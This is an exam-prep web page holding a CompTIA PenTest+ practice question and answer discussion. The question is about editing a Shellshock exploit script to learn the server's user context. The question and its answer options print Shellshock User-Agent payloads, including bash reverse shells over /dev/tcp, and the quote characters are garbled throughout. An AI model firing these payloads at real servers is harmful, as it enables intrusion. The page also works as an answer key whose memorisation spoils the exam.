Welcome to ExamTopics
ExamTopics Logo
- Expert Verified, Online, Free.
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT1-002 All Questions

View all questions & answers for the PT1-002 exam
Go to Exam

Exam PT1-002 topic 1 question 93 discussion

Actual exam question from CompTIA's PT1-002
Question #: 93
Topic #: 1
[All PT1-002 Questions]

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {`User-Agent`: `() { ignored;};/bin/bash `"i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/ html,application/xhtml+xml,application/xml`}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
  • B. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
  • C. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/sh ג€"i ps ג€"efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
  • D. exploits = {ג€User-Agentג€: ג€() { ignored;};/bin/bash ג€"i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€, ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️
by BinarySoldier at Nov. 27, 2021, 9:10 a.m.

Comments

Chosen Answer:
This is a voting comment (?) , you can switch to a simple comment.
Switch to a voting comment New
Submit Cancel
Davar39
Highly Voted 2 years, 9 months ago
I'll go with A, since it directly returns output regarding the user. D looks like a reverse shell.
upvoted 9 times
...
BinarySoldier
Highly Voted 2 years, 10 months ago
Why is this not A?
upvoted 5 times
...
Anarckii
Most Recent 1 year, 4 months ago
Selected Answer: A
Whoami
upvoted 1 times
...
Sborrainculo
1 year, 9 months ago
Selected Answer: A
whoami gives user context
upvoted 1 times
...
slizzy420
2 years, 1 month ago
Selected Answer: A
To me it is A
upvoted 3 times
...

Get IT Certification

Unlock free, top-quality video courses on ExamTopics with a simple registration. Elevate your learning journey with our expertly curated content. Register now to access a diverse range of educational resources designed for your success. Start learning today with ExamTopics!

Start Learning for free
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel